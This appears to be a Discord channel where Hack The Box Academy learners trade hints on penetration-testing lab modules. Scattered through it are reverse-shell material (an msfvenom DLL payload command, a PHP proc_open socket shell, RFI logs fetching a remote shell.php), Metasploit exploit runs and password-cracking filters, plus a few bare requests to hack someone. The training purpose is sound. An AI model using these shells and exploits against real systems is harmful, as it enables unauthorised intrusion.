#modules

1 messages · Page 3 of 1

plush edge
#

Hi!!
If any can help, most appreciated!

I got stuck on the Microsoft Fundamentals module, NTFS vs Shared Points section.

I have to set up a mount point with the given cmd, but when I do, it doesn't work. I tried using sudo apt-get cifs and update, but it get an error and doesn't really update either.

Any help?

hazy grotto
#

I don't think so. It may take a few minutes. Try logging in and out.

polar apex
hazy grotto
hazy grotto
plush edge
#

Thanks for replying 👍

drifting knoll
#

@wind plaza pls be careful with spoilers...

balmy creek
#

Hi mate, any hint? I'm struck too

rustic sage
#

hi, I'm new

#

Don't dox me please

#

LOL

glacial blaze
#

Thank you. Aready thought about that and tried to generate all tokens for all milliseconds one second past to one second after.
Maybe i made a mistake here. Will try again later.

small pawn
lethal atlas
#

Ok I need help with Password Attacks, Credential hunting in Linux. Just a nudge in the right direction please.

#

I have read the hint. Created password lists based on just the hint, used custom rules on the password.list file ran it against K and W and the whole username.list file and still nothing.

vital adder
vital adder
lethal atlas
vital adder
lethal atlas
#

I dont see an ftp port open

vital adder
raven cairn
#

Could I have a little bit of help with OSINT corporate recon?

#

In the "domain structure" section, it asks for a hosting provider. I did a whois. I am 99% sure my answer is right.

#

And in the "Email addresses" section I can't find the CEO's email. I have used TheHarvester and google dorks, but I still cannot find his email.

mortal crystal
#

Hi, i need help with Pivoting, Tunneling, and Port Forwarding : Skills Assessment, so if someone has time, please DM me

west canopy
#

@raven cairn DM me 🙂

knotty summit
#

hi

#

i don't remember the command sql for display the tables ?

#

i tries select * from [table] but it not true

west canopy
#

might need to put semicolon at the end ;

knotty summit
#

but it not that

#

Select * from <table> ;

#

but the flag does not appear

#

i just found sorry

mortal crystal
#

Holy fuck, ping sweep from powershell shows different results than cmd ping sweep

final frigate
#

Hi, on the SMTP from the Footpringint module, in the second question they ask you to use a wordlist to enumerate users, I tried it with different tools but any of them could find the username, what I'm doing wrong?

acoustic owl
final frigate
#

I'm using it, but can't find anything

acoustic owl
#

Ah okay, I see it.
Remember that servers can take longer to respond.

final frigate
#

Even though all the ouput gives no result

#

the hint talks something about the usernames, but I can't really understand it

acoustic owl
#

Standard Query timeout is 5 sec
If the server takes longer to respond, you need to increase this value.
https://www.kali.org/tools/smtp-user-enum/

trail pendant
#

Anyone able to assist in the File upload skills assessment. I feel a little lost at getting a foothold. Gathered a lot of information, that I just can't seem to put together the right way :/

acoustic owl
trail pendant
half cave
#

If I pay for let's say the "Silver" plan where I get 200 cubes each month, will these cubes be added to my account or will I have 200 cubes each month to spend? So will I have after 2 months 400 cubes (if I don't spend them) or just 200?

shadow verge
#

They add up

half cave
slow ruin
#

Anyone available to give me a nudge on File Upload Attacks - Type Filters?

rustic sage
#

Is the Academy just an entirely different signup than the HTB?

west canopy
#

yes its a separate account from the main website

knotty summit
#

hi i m blocket for tried to brute force with an password/login

#

i don't know what tools use ?

#

which

night pier
#

can someone give me some help on file upload attacks whitelist - I've successfully uploaded and tried 60 different name variations but I get 404 or permission denied when trying run commands.

rustic sage
#

hi can anyone help me with the easy lab footprinting ? i am stuck to finding the ssh key.

west canopy
#

@rustic sage did you connect to ||the ftp? try looking for hidden files/folders :)||

#

@slow ruin DM me 🙂

quasi pilot
#

Hey can anyone help me with starting point tier 1 (appointment) task 4? Im not sure where to find the classification name

ebon coral
cursive grove
#

Module-Network enum with NMAP / HOST discovery question

#

Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result.

west canopy
#

@cursive grove they are basically asking ||what a TTL of 128 means :)||

manic ermine
#

Is anyone available to help me with the footprinting module question on DNS? The final question is about finding the FQDN of the host where the last octet ends with "x.x.x.203". I've been on this for about 6 hours now and done literally everything I can think of with every single subdomain list on seclist and got absolutely nothing.

manic ermine
#

🙏 🙏 🙏

acoustic owl
manic ermine
umbral plume
#

Hi All, I have been stuck on Question 3 of Skills Assessment - Using Web Proxies for last 3 hours. Can someone guide me please?

carmine cape
#

Hey I am stuck in WordPress Skills Assessment. I can't figure out how to start, so feel free to give any hints to how I can proceed, either here og dm 🙂

acoustic owl
rustic sage
#

did you solve the problem? i'm having the same issue, i found only three subdomains in the Attacking common services, dns section. then when i try to dig to any of them i can't find the flag. any hints?

carmine cape
acoustic owl
rustic sage
carmine cape
uncut mirage
#

Hi, I'm stuck in the Skills Assessment section of the Hacking WordPress module.

I've managed to answer all the questions except for Question 5: "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.".

I have no idea what file/plugin they are referring to... Can I get a hint please?

acoustic owl
uncut mirage
polar apex
#

how long does it usually take to spawn target in Active Directory Enumeration & Attacks module ?

tidal orbit
#

Can somebody help me with getting NTML hash of bross user in Active Directory Enumeration & Attacks in Attacking Domain Trusts - Child -> Parent Trusts - from Linux chapter?

acoustic owl
lethal atlas
#

Good morning everyone!!

#

Starting my morning with a red bull and cracking an sha512 hash.

fair basin
deep delta
fair basin
#

I've been trying to do this for hours 😉

deep delta
#

yeah ik m8 but that whole module is supose to teach you how to bypass those filters

fair basin
#

preg_match('/^./languages/.+$/'

#

i know ....

#

my ideas have run out

lethal atlas
fair basin
#

the problem is that i do not get any error message on the website

deep delta
#

thats good

fair basin
#

😉

deep delta
#

that means your url isn't being filtered out

trail pendant
acoustic owl
deep delta
#

Warning: include(http://0.0.0.0:8080/shell.php): failed to open stream: Connection refused in /var/www/html/index.php on line 47 Warning: include(): Failed opening 'http://0.0.0.0:8080/shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/index.php on line 47 i get these two notable warnings

fair basin
#

you must replace the 0.0.0.0 ip

deep delta
#

no i can still connect to the server in my browser with 0.0.0.0

#

and the port

#

and get the php file

deep delta
fair basin
#

have you try your VPN IP address and start first NC on 8080

deep delta
deep delta
#

to the vpn ip

final frigate
deep delta
#

webshell

timid dock
#

Should be

timid dock
#

Could also try and change the name of your shell.php extension to be .txt

deep delta
#

nope still dosn't work

timid dock
#

Damn

#

Why dont you try using the default cmd web shells that kali linux comes with?

#

locate webshells | grep cmd

#

These are much simple to server

#

Since you dont need to add the cmd=

#

Or anything else

#

Other than the name of the file

deep delta
#

i am using parrot security

placid quest
#

@deep delta maybe you have a problem with how you had to set the reverse shell

deep delta
#

because in my browser i can go to it

#

but not on the web page

placid quest
#

@deep delta what if you set up a reverse shell using nc

deep delta
#

whats nc?

#

@placid quest

placid quest
#

@deep delta netcat

deep delta
#

ahhhh

#

how would i go about doing that?

deep delta
lethal atlas
sturdy agate
#

Hello, Im working through the Shells & payloads module and on the php web shells section. I keep getting WARNING: Failed to daemonise. This is quite common and not fatal.(111). Not sure what i'm doing wrong here would anyone be able to help me please?

rustic sage
#

stuck on privileged groups linux privilege escalation exercise

#

/module/51/section/477

onyx dust
onyx dust
#

yeah he told me that nothing in this world is smooth

#

only in 3d renderings heheehe

sturdy agate
timid dock
#

Anyone got some advice on footprinting IMAPs and POP2

#

POP3*

#

I dont really get what one would get out enumerating them other than mass spamming emails. I also couldn’t figure out how to use commands within the IMAPs server once connecting. I tried selecting a mailbox to look at the messages inside but I just kept getting bad IMAPs command error

onyx dust
#

the imap server u gotta preface them with a character i forgot what it is but i think it's a

#

if you're connecting raw

#

type ahelp

timid dock
#

And the POP3 server I used OpenSSL as well. I tried enurmating the IMAPs server with curl

#

But it didnt really tell me the admin email

onyx dust
#

what are u on send the link

timid dock
#

hope it isnt too much trouble btw, thanks for the help

onyx dust
#

which question are u on

timid dock
onyx dust
#

ahh yesa

timid dock
#

Thanks!

timid dock
rustic sage
#

it's just 1 question

#

"Use the privileged group rights of the secaudit user to locate a flag."

timid dock
#

yeah

#

you have the privs to read commands

#

you can do ls -la

rustic sage
#

in the /var/log?

timid dock
#

look for all directories where u have group permission read access

#

and recursively list their files

pure silo
#

Hey all apologies in advance for the noob question but i'm stuck on the priv esc portion of "knowledge check". I tried sudo -l but can't access the file. I'm new to priv esc so any help would be appreciated.

#

also the directory listed when i type sudo -l doesn't exist, and I can't make it.

pure silo
#

this module is what i'm on

grave dust
#

hi i'm on the "pivoting" room on the "Remote/Reverse Port Forwarding with SSH" part. I tried to apply what i learn in this section without success. i get the .exe on the windows machine, i used this command to make the windows communicate with my kali :
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.202.64 -vN
The msfconsole doesn't get the shell but the ssh command tells me :

covert stag
#

pff lets give serverside attacks assessment a new try

#

how is it possible that i cant complete it:(

#

took me 3 hours to complete another module before i thought of trying admin:admin

tropic coral
#

how i hack somebody

rustic sage
#

at POST section

#

the answer is []

#

i tried many times, even followed a tutorial 1:1

#

if anyone could check it for me I would be thankful

#

it's about getting cookie session to log into a search.php of a flag

covert stag
#

u can do it here on htb or go and join anonops then #learninghub

#

they have also a lot of stuff

#

depends on what u want

#

then i would start with htb academy

half cave
half cave
#

Instead of using the pwnbox, setup your own VM or use your own browser

#

I'd suggest creating your own VM as it is easier

rustic sage
#

i aint using pwnbox, i use cmd or a browser

#

most of the time both

#

but I am alright with knowing that there are some problems with this section, and that wasn't really my fault

#

so thank you 🙂

rustic sage
half cave
half cave
rustic sage
#

good, ill try to do it on a laptop then

half cave
rustic sage
#

yea i did i precisely

half cave
#

If you're still struggling you can also DM me

rustic sage
#

what are you using to type the commands? i am just using a basic windows10 command line

#

okay ill dm you not to spam

covert stag
#

can someone please awnser me a question about server side attack sessment

#

if the awnser is no ok i move forward

#

ername wordlist

#

fuck

vale salmon
#

If possible, I need a nudge on SQLMap Essentials. For Case #10, I keep getting POST Parameter 'id' might not be injectable and I am not understanding why

west canopy
#

@vale salmon DM me 🙂

covert stag
#

DAMN FINALLY

#

stupid ctf while i try to use things learned in the module

#

yeey

surreal rain
#

congrats!

covert stag
#

tnx:)

covert stag
#

Some say, "work smarter, not harder."

wind plaza
native quarry
#

Hello, is this the best place to ask for a hint on an HTB academy module?

native quarry
#

So far, I have already done
||msfconsole
use scanner/http/wp_simple_backup_file_read
set RHOSTS (ip)
set RPORT (port)
run||

I can see the output that metasploit returned
||/home/kali/.msf4/loot/20220806165131_default_178.62.115.160_simplebackup.tra_069605.txt||

I've also found
||(ip:port)/wp-admin||
I just can't seem to figure out how to use a ||username & password against wp-admin||, since the information in the txt shows ||encrypted passwords||

manic ermine
native quarry
#

The subject of the page is Public Exploits. The question at the bottom reads

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

native quarry
manic ermine
# native quarry It's basically an introduction in how to find exploits, and configure/run them a...

Ok, I've gone back to remind myself of this one - I wasn't taking good notes back then so I had to re-do it.
You've solved it already. Make sure you have set the FILEPATH in MSF properly to what you're looking for. Then go in and read the file that has been written to your machine at the location listed (i.e. /home/kali/.msf4/loot/20220806165131_default_178.62.115.160_simplebackup.tra_069605.txt)

manic ermine
native quarry
native quarry
#

Ah! Finally!!!

native quarry
# manic ermine Yep

Thank you so much, @manic ermine! I knew I was close, I was just like "WHAT AM I MISSING HERE!?" 😆

#

Alright, I'm out for now. That has been bugging me for a few hours. I'll pop back in if I have more issues. Thanks again, @manic ermine 😄

manic ermine
native quarry
#

Oh dang, looking to complete that myself. Excited for you, dude! 😄

covert stag
#

im doing the metasploit module now🤣

wind plaza
#

me too

wind plaza
covert stag
#

I use openvpn

wind plaza
#

can you create session successfully

covert stag
#

well not right now

#

i switch

#

probably

wind plaza
#

I dont know if it is a big problem or just use pwnbox in this module

modest token
#

FTR if anyone else gets stuck on this, you need to use impacket’s secretsdump.

rain marlin
#

Can anyone assist with this issue of mine? I'm in the "WEB REQUESTS" mod and at the end answering the question to "Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'" to which I've aquired the cookies to the site the Target took me to and ran the following code in the terminal "curl -X POST -d 'username=admin&password=admin' -b 'PHPSESSID=scl9tv8j6heti8hobegvasghio' -H 'Content-Type:application/JSON' http://178.62.115.160:30959/search.php
" and I'm meant with "Received content contained invalid JSON!" please no answers just guidance to something I may be missing or a push in the right directions#WebRequests

#

I know it's has to be with something with the Header or the flags I'm using but missing something and it just not clicking with me.

vital adder
vital adder
rain marlin
vital adder
rain marlin
#

Yeah just did it and sure enough it did only take 2 sec

rain marlin
quaint marsh
#

Windows Privilege Escalation -SeDebugPrivilege

#

Did everything work for you the first time? Or did you need to Enable status to "debug programs"?

iron plaza
#

Hi, in the Intro to Network Traffic Analysis (module 81 section 787) what format am I expected to answer the question "What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)" I tried ||80 1030|| but that didn't work.

quaint marsh
quaint marsh
#

I understood what needs to be done manually using the task manager.

#

but problem repeated

wraith sapphire
#

Hi everyone,
I am stuck in this Nmap module(easy lab), which tells us to find the name of the OS, here is what I tried so far:
command 1: sudo nmap ip_addr -sS -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [This is not giving me the exact OS, rather Nmap is guessing it, I cannot scan all the ports as it takes a lot of time and HTB target machine is limited to 60 min]

I then used this command, I used -sA option with the following :
sudo nmap target_ip_addr -sA -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [Nmap gave me the OS name but when i entered this in the answer section, HTB is telling me its a wrong answer!]

Am I missing something silly here!? [I am a noob by the way!]

worthy yoke
#

Hi everyone , im stuck in module Broken Authentication - Bruteforcing Passwords , i thought i found the password policy include at|| least 3 characters including uppercase , lowercase , and numbers|| , i did a filter for matching characters in the list from rockyou-50.txt but no which password is correct, where did i go wrong?

#

I use the grep command as follows:
grep '[[:upper:]]' /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-50.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '^.{0.12}$'

#

||Password1
Princess1
P@ssw0rd
Passw0rd
Jesus1||

quaint marsh
mighty estuary
#

hello

worthy yoke
#

hi

oak sigil
#

is htb academy free?

placid quest
#

@oak sigil yes

oak sigil
placid quest
#

@oak sigil but some modules you need to pay

oak sigil
#

would you be able to tell me which these are?

placid quest
#

@oak sigil You will find out if you have access to academy hackthebox

final frigate
manic ermine
#

Module : Using Metasploit Framework
Sub : Sessions
can anyone help with the final question for this? I have run the ||local exploit suggester||, and tried ||exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec||, ||exploit/linux/local/pkexec|| and ||exploit/linux/local/su_login|| to no avail. It says "target appears to be vulnerable" and "exploit completed, but no session was created". p.s. i have confirmed I've correctly set LHOST.

worthy yoke
final frigate
grave dust
#

did u get any answers ? i get the same error. i tried to scp the library but still getting errors

manic ermine
#

It's the one in the "sessions and jobs" page

iron plaza
manic ermine
#

@iron plaza yeah, that's the one

iron plaza
manic ermine
#

@iron plaza, hmm ok, so none of the ones I mentioned are correct then?

iron plaza
manic ermine
#

Oh, ok, awesome, thank you @iron plaza

covert stag
#

If this command is not working check the syntax. If the syntax is correct yet the command is still working

#

is still (not) working i guess

shadow orbit
#

Hi, I am having troubles with Web Service & API Attacks - Skills Assessment. I can not even craft a login request that is accepted. Please DM me

grave dust
#

does anyone have had this error on the pivoting module "RDP and SOCKS Tunneling with SocksOverRDP" section

candid sandal
#

Does anyone know if there exist a module in the Academy to work on Python scripting skills ? I feel like it is becoming almost a must to script in Python for many positions on the market :/

candid sandal
acoustic owl
naive pelican
#

Hello i am stuck in /module/23/section/513

#

i tried many things it teached me, but i failed. Can anyone push me in the right direction

grave dust
#

on the pivot module the las part (full windows)
I get errors all the time. like, the dll is seen as suspicious so windows delete it.
I can't even connect to the other machine using mstcs
any guess ?

deep delta
deep delta
#

yeah ik

naive pelican
#

try hosting a http server and put your own ip

acoustic owl
naive pelican
#

im stuck in the same module the final one is hard

grave dust
deep delta
acoustic owl
grave dust
naive pelican
#

dont forget the port

deep delta
acoustic owl
naive pelican
deep delta
#

still dosn't show

#

do i need open vpn to be in my vm?

naive pelican
#

yes

deep delta
#

thank you i think thats the problem

#

its on my main pc

grave dust
acoustic owl
deep delta
#

@naive pelican thanks m8, i didn't realise the problem was that small 😄

naive pelican
#

no worries mate

#

i wish someone helped with my problem too 😢

acoustic owl
naive pelican
#

im stuck on skills assesment

acoustic owl
naive pelican
#

||i found ?page=, when i fuzz this to try to read /etc/passwd with LFI-jhaddix.txt i had no luck||

acoustic owl
#

You are in the right place, but the file you want to read is not helping you. ||Read the code of the index.php ||

worthy yoke
naive pelican
acoustic owl
worthy yoke
acoustic owl
worthy yoke
#

so can you suggest me the correct grep for this question?

worthy yoke
wraith sapphire
#

Reposting this, if someone can help, thanks in advance!:
Hi everyone,
I am stuck in this Nmap module(easy lab), which tells us to find the name of the OS, here is what I tried so far:
command 1: sudo nmap ip_addr -sS -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [This is not giving me the exact OS, rather Nmap is guessing it, I cannot scan all the ports as it takes a lot of time and HTB target machine is limited to 60 min]

I then used this command, I used -sA option with the following :
sudo nmap target_ip_addr -sA -p 1-100 -v -Pn -n -O -T1 --max-retries 5 [Nmap gave me the OS name but when i entered this in the answer section, HTB is telling me its a wrong answer!]

Am I missing something silly here!? [I am a noob by the way!]

west canopy
#

@wraith sapphire i was able to solve it using ||nmap -A (look at how it fingerprints the SSH service, it should reveal a specific linux distro.)||

final frigate
#

Need help with the shells and payloads module, the skills assesment in the tomcat part, I have done this like two times, but with the nomachine connection I can't properly see and don't know if I'm missing something

wraith sapphire
west canopy
#

sec i will DM you 🙂

#

-sA might be messing you up since that's an ACK scan

acoustic owl
final frigate
acoustic owl
mint solstice
#

Someone available to help me in lfi assessment task?

acoustic owl
mint solstice
#

In the final step to read the flag

inland wren
#

i connected to hackthebox academy vpn on a vm and now i can't use commands and whenever i press ctrl+c it disconnects from vpn

#

ignore the white discord theme ;-;

acoustic owl
inland wren
#

i'm trying to connect to hackthebox academy vpn

#

i ran the command openvpn academy-regular.ovpn and it worked the problem is that now i can't execute commands

acoustic owl
autumn pilot
#

do not use your main OS for connecting to the VPN

#

this is a recommendation

#

next recommendation would be to choose a OS, ubuntu, kali or parrot to use it as a virtual machine

inland wren
#

I'm using a virtual machine made by Microsoft azure

#

it's an ubuntu

autumn pilot
#

if its WSL, feel free to use tmux to manage multiple screens/terminals

acoustic owl
tight mesa
#

hello anyone who has completed the File Upload Module?

leaden burrow
#

Anyone able to provide a hint on the knowledge check portion of the nibbles box for the Cracking into Hack the Box module? I am at the last exercise with the 2 questions. I am struggling to understand where i should look for a password for the get-simple admin login, any clues would be most appreciated!

wheat garden
leaden burrow
#

Ah. Okay, thanks anyway

wheat garden
final frigate
#

does Password Attacks take much time? Or with the correct wordlist just a few seconds? I'm just in the first section and spend like 15 minutes brute forcing

radiant dagger
#

Windows Privilege Escalation Print Operators Tools doesn't include UACMe repo or binaries.

#

Could I get some nudge on it, please?

west canopy
#

@radiant dagger i might be able to help

glad tartan
#

is there anything here on reverse engineering wireless data I am trying to learn that since I am a TSCM professional I need to do Signal Intelligence.

wheat garden
wheat garden
glad tartan
#

no this is more military grade signals such as a UWB Comb signal that can penetrate the earth or anything

#

ground penetrating radar specifically that generates pressure waves

#

trying to do sigint on the data inside it

wheat garden
#

man ya sounds like some deep stuff dont think they go over military style signals int and electronic warfare specifically here on hack the box. THough alot of the stuff learned here can transfer over.

glad tartan
#

hmm wont let me upload a image of the signal

#

if anyone thinks they can get the audio out of the IQ data let me know DM me.

#

kind of what I do is analyze wireless data and demodulate it to make since of it

wheat garden
slow ruin
#

Need a nudge on File Upload Attacks - Limited File Uploads. Crafted the ||XXE exploit|| then uploaded the exploit went to the directory of where it was uploaded and viewed the source but got nothing. The page says XML file does not appear to have any style information associated with it.

nvm got the flag!

native quarry
#

What would be the best way to download a file locally to my attackbox, while ssh'd into a machine with escalated privileges?

I ended up just cat'ing a file, copy and pasting the text locally, but I feel like there's a more obvious way to do it.

Sources online were talking about doing something like scp -P (port) username@(ip):/file/location /local/dir but I had to escalate from one account to another in order to read the file, so that doesn't really apply. Is there a different command I should be using?

mossy solstice
autumn pilot
#

We are currently investigating an intermittent issue with spawning the workstation on Academy.

autumn pilot
#

^ A fix has been pushed, please if are experiencing the issue, try respawning the workstaiton.

rustic sage
#

Hi i'm having some problems in the Dynamic Port Forwarding with SSH and SOCKS Tunneling section because after i pivot successfully to the target and i scan it with nmap i only found port 22 and 80 opened and i don't understand how to connect to rdp. any hints?

rustic sage
#

i've the same problem can i dm you

sly kelp
#
proc_open('sh' , array(0=>$sock, 1=>$sock), $pipes) ```

hello can someone please explain what the array and $pipes is doing in this shell
lethal atlas
#

ldd --version

supple drift
#

Can engine tell me a good python coding tutorial for free

#

Anyone*

acoustic owl
# supple drift Can engine tell me a good python coding tutorial for free

0:00 - Introduction
2:49 - Installing Python
9:41 - Strings
17:06 - Math
22:55 - Variables and Methods
33:16 - Functions
42:18 - Boolean Expressions and Relational Operators
50:56 - Conditional Statements
57:58 - Lists
1:10:15 - Tuples
1:12:30 - Looping
1:17:03 - Advanced Strings
1:29:47 - Dictionaries
1:36:15 - Importing Modules
1:42:18 - Socke...

▶ Play video

What I use to learn (the BEST IT training): https://ntck.co/itprotv (30% off FOREVER) *affiliate link

🔎🔎FREE Python Lab: https://ntck.co/pythonep1
Support the course: https://ntck.co/pythonrightnow

🔥🔥Join the NetworkChuck membership: https://ntck.co/Premium

**Sponsored by ITProTV

SUPPORT NETWORKCHUCK
-----------------------------------...

▶ Play video
lethal atlas
#

Those are both excellent sources.

supple drift
#

Thanks a lot

grave dust
#

on windows priv esc "DnsAdmins" part, i manage to get my user in the DnsAdmins but can't access the flag. Some people on the serv said we need a reverse shell but what is wrong in my reverse shell creation ?
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll -o shell.dll

candid sandal
#

The hint says It is in this form: HTB{...}

lethal atlas
#

you missed a character

candid sandal
lethal atlas
#

after you run the code thru prettier, take the output and run it thru jsnice

languid dawn
#

Please don't post flags even if incomplete

candid sandal
lethal atlas
#

@candid sandal feel free to DM me

candid sandal
# lethal atlas <@656312582897926144> feel free to DM me

I followed the steps you mentioned and I found the missing character. I initially thought that the purpose was just to find the flag in the sources, but it seems that it required to use some tools (not mentioned in the lesson) to find the correct flag to sumbit

vast geyser
#

Hi ,If I want to fuzz two parameters in Intruder of Burp ? like this:
id=1&pass=a,
id=2&pass=b,
id=3&pass=c, and so on,How can I set the payload?
Thanks

lethal atlas
candid sandal
lethal atlas
#

can I get a sanity check on Password Attacks? On the section Linux Local Password Attacks/Passwd, Shadow, & Opasswd. I have grabbed the files, created the unshadowed file, and ran it against rockyou with hashcat but found no passwords. I am pretty sure 1800 is the correct setting. What am I doing wrong?

lethal atlas
night pier
#

@lethal atlas can I dm about file upload attacks - file type ?

half cave
#

File Inclusion - Automated Scanning - I think this section is broken. When you follow the tutorial step by step it doesn't work

raven cairn
#

Can I have sanity check on Shells and payloads - "The live engagement"?

#

Skills assesment should be pretty easy but my reverse shells aren't working

half cave
#

Can someone help me with "File Inclusion - Automated Scanning"?

west canopy
#

@half cave DM me 🙂

acoustic owl
#

Oh, @west canopy was faster

night pier
#

Anyone able to help me out with file upload attacks skills assessment?

knotty summit
#

hi im block for a question help please

acoustic owl
knotty summit
#

responder

acoustic owl
dim cloak
#

Hi guys! i need help with lab medium of footprinting module. I don't understand how to change to administrator user

dim cloak
dim cloak
storm ermine
#

Hi i want to skip google access if you have idea or way dm i will buyed not problem

hollow pike
#

could i get a bit help with the linux fundamentals module, for example it asked me for the kernel version which i did uname -v for and the value i get is apparently not the right awnser; pretty much everything is not the right awnser is this module broken?

hollow pike
#

still not

lethal atlas
raven cairn
#

I agree. Not broken

west canopy
#

@hollow pike did you SSH into the target and then run the command?

hollow pike
#

oh about that, thank u for the reply but yeah, i messed up on that part, already got guided tho, turns out i was doing these commands on pownbox not the target, still appreciate the response

leaden burrow
#

I am still stuck on the knowledge check for the final part of Cracking into Hack the box, I tried to escalate privileges on the target but it returned an error, is there something other than LinEnum.sh i need to use for this?

leaden burrow
#

even tried Linpeas.sh, cannot write to, permission denied

#

w t f

wheat garden
wheat garden
wheat garden
leaden burrow
#

the lesson starts you off working your way into a machine where you exploit a code execution vulnerability

#

you upload a .php code to trigger a reverse shell connection into an image upload

#

i have no clue about any ssh or the likes yet

#

all of that i did without issue, but then moving on into the knowledge check i was able to replicate the same sort of action through the themes edit page on the next target

#

just by putting the reverse shell code into the themes edit field, then visiting that page executes the reverse shell

#

but this environment is behaving as if the LinEnum.sh script didnt REALLY escalate my privileges or something

#

even though I did eventually get it to allow it

#

but once i cd to the /home directory, its still giving me a hard deny and sudo spits out how a terminal is required to read password

wheat garden
leaden burrow
#

Yeah thats not exactly what I meant by that, I was just saying i was under the impression that the lesson knowledge check would follow the same formula. Not have me go off trying to do something i have only ever even done in a networking class a year ago.

#

Thats all im saying haha

wheat garden
raven cairn
#

Better to learn the hard way then the easy way

leaden burrow
#

All right, fair enough

raven cairn
#

I've been working on the skills assesment on the shells and payloads section for 6 hours today. Im F'ing done with it man

#

could I have another sanity check please

#

Having issues with exploiting eternal blue

#

This is me right now ^^^^

wheat garden
wheat garden
raven cairn
#

I have been trying the metasploit module.

wheat garden
wheat garden
# raven cairn

well another common trouble shooting is if your using your own VM why not try it inside the pwnbox see if you get different results

raven cairn
#

I have been changing the payload to and that hasn't been working either

wheat garden
#

0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution

#

I havent done the shelll/payloads module yet specifically so dont know much else to help you. Only done a few boxes that utlizied eternal blue exploitation and the metasploit modules always worked for me.

#

dont know much about the machine your doing you sure its vulnerable to eternal blue? Could run a nmap script that checks for it

#

nmap --script=smb-vuln* <target ip>

raven cairn
#

HOLY FUCK

#

I GOT IT

#

WHAT THE FUCKING FUCK

#

I HAD THE WRONG LHOST

#

AFTER 6 HOURS

#

OH MY GOD!!!

wheat garden
#

rofl

raven cairn
wheat garden
#

well glad you got it

supple drift
#

My vs code stopped working, actually I can write codes in it but it can't run them, I have to open the python file with shell to run it can anybody help?

wraith sapphire
#

Hi everyone,
Requesting help on Nmap module: Hard lab
Honestly, I didn't understand the question on what service version are we expected to find, I ran Nmap along with version scans and found SSH and HTTP port open along with their version, but thats not the correct answer. Hint talks about customer wanting large amounts of data(I initially thought about FTP!!) but then only HTTP and SSH is open.
Can someone give me a clue on what needs to be done here? Is there some flag that I need to find?
[P.S: Complete Noob here!!]

west canopy
#

@wraith sapphire DM me 🙂

manic ermine
#

Is somebody available to help me get he double pivot working to MGMT01 on Attacking Enterprise Networks module (post exploit section). The handler on my host doesn't catch DC01 payload even tough everything is set up ok.

west canopy
#

@manic ermine i might be able to help !

manic ermine
west canopy
#

sure 🙂

drifting grail
#

Hi, everyone requesting help for Broken authentication predictable reset token. I modified the script to make it the admin user, concatenated the user and time together, and md5 the combined string value and brute forced with the time differences included but still no hit. Cant seem to figure it out any help is appreciated thanks.

rustic sage
#

i've the same problem how you solved it?

stiff moon
rustic sage
grave dust
#

anyone knows why is this happening ?

hazy grotto
#

ls

grave dust
spare condor
#

Active Directory Enumeration & Attacks / Bleeding Edge Vulnerabilities. Any one to DM for help?

rustic sage
#

with which tools you find vulnerability

#

help

knotty crag
#

hello guys

#

i am new into hacking

#

i really would appreciate if i get help

#

beacause i really want some help

#

cuz i like hacking very much

#

THANKS !!

#

i know a bit of coding and made few projects

knotty crag
#

👍 👍

drifting glacier
#

Question on "Communication with Processes" windows priv escalation module

#

What is the correct format on the answer for the question "Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?"

#

I was able to local the pipe information ussing accesschk, but none of the answers are being accepted. Anyone around for a nudge? I've got my screenshot ready to show I'm not just looking for the answer without prior work put in

glad solar
#

im stuck at this

drifting glacier
#

Disregard, if anyone comes across this confused as i was, the whole service name needs to be entered (ie NT SERVICE longservicename)

drifting glacier
devout bear
#

targets not being recognized?

glad solar
#

Getting started

#

Service scanning

knotty crag
#

guys how to hack someone's ip

#

which tool

#

what command

#

pls help

glad solar
#

google

knotty crag
#

google?

glad solar
#

ye

knotty crag
#

what command

#

or search

glad solar
#

did you just came here to try to get someones ip?

knotty crag
#

no

#

seriously no

glad solar
#

wich module are you in then?

drifting glacier
glad solar
drifting glacier
#

hmm, let me see if i've done that module already, hang tight

glad solar
#

also tried with -N and -L

knotty crag
#

i just saw a google search that first ste to hack someone is to get his/her ip

#

thats why i asked

#

sorry if it is against the rules

glad solar
#

even if you get their ip you need to know what to do next

knotty crag
#

yes

#

but i dont even know how to execute the first steo

#

step

glad solar
#

also if you dont "hide" your ip they will know the connection came from you

knotty crag
#

yes

#

thank u

glad solar
knotty crag
#

by reverseshell right

drifting glacier
drifting glacier
#

If i remember right, had to run hydra to get the weak password bob uses

knotty crag
#

guys which tools to use for hacking

lethal atlas
lethal atlas
knotty crag
#

i get that but what tools

#

i know i can learn from that

#

but how to practice

lethal atlas
#

YOu practice in academy

knotty crag
#

ok

#

got it

lethal atlas
#

they teach you the tools, what they are used for, how they are used

glad solar
lethal atlas
#

which section, I can look at my notes

#

sorry

glad solar
#

give me just a sec

knotty crag
#

yeah i did that

#

its very good

#

i know a bit of coding and hacking but not much

glad solar
lethal atlas
#

The cyber mentor has some really good stuff on youtube as well

glad solar
#

^^

#

also the first method to learn hacking is "googling" what you need

dusk sequoia
#

